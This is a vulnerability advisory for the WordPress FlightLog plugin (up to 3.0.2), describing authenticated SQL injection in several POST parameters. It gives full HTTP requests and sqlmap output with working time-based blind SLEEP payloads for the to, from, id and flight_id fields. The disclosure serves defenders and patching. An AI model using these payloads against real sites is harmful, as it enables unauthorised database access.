WordPress Plugin Vulnerabilities

FlightLog <= 3.0.2 - Authenticated (editor+) SQL Injection

Description

The plugin does not sanitise, validate or escape various POST parameters before using them a SQL statement, leading to SQL injections exploitable by editor and administrator users

Proof of Concept

1. to and from parameters (Editor Level)

Tools -> Flightlog -> add a record

POST http://172.28.128.50/wp-admin/tools.php?page=flightlog-entries-menu HTTP/1.1
Proxy-Connection: keep-alive
Content-Length: 116
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://172.28.128.50
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-GPC: 1
Referer: http://172.28.128.50/wp-admin/tools.php?page=flightlog-entries-menu
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [editor+]
Host: 172.28.128.50

section=flight&dt=&from=1&to=1&carrier=1&aircraft=1&ifr_vfr=0&day_night=0&approaches=&landings=&plane_id=&Submit=Add


Sample SQLMap Output
sqlmap identified the following injection point(s) with a total of 467 HTTP(s) requests:
---
Parameter: to (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: section=flight&dt=&from=1&to=1 AND (SELECT 1824 FROM (SELECT(SLEEP(5)))Eims)&carrier=1&aircraft=1&ifr_vfr=0&day_night=0&approaches=&landings=&plane_id=&Submit=Add

Parameter: from (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: section=flight&dt=&from=1 AND (SELECT 9760 FROM (SELECT(SLEEP(5)))zCHx)&to=1&carrier=1&aircraft=1&ifr_vfr=0&day_night=0&approaches=&landings=&plane_id=&Submit=Add
---


2. id parameter vulnerable (Admin Level)

Steps 
- Settings -> Flightlog
- add an airport
- update the airport

Sample Request


POST http://172.28.128.50/wp-admin/options-general.php?page=flightlog-settings-menu HTTP/1.1
Proxy-Connection: keep-alive
Content-Length: 84
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://172.28.128.50
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-GPC: 1
Referer: http://172.28.128.50/wp-admin/options-general.php?page=flightlog-settings-menu
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [admin]
Host: 172.28.128.50

section=airports&id=2&name=a&iata=BHO&lat=0.0000000&lng=0.0000000&Submit=Update


SQLMap Output
Parameter: id (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: section=airports&id=2 AND (SELECT 1421 FROM (SELECT(SLEEP(5)))GfMZ)&name=bhopal&iata=BHO&lat=0.0000000&lng=0.0000000&Submit=Update


3. flight_id parameter vulnerable (Editor Level)

Steps
- Login as editor
- tools -> FlightLog
- Edit a flight log entry and add a remark

Vulnerable Request

POST http://172.28.128.50/wp-admin/tools.php?page=flightlog-entries-menu HTTP/1.1
Proxy-Connection: keep-alive
Content-Length: 52
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://172.28.128.50
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-GPC: 1
Referer: http://172.28.128.50/wp-admin/tools.php?page=flightlog-entries-menu
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [editor+]
Host: 172.28.128.50

flight_id=3045&section=rem&remark=Test&Submit=Update


SQLMap Sample Output
Parameter: flight_id (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: flight_id=3045 AND (SELECT 1932 FROM (SELECT(SLEEP(5)))XEdw)&section=rem&remark=Test&Submit=Update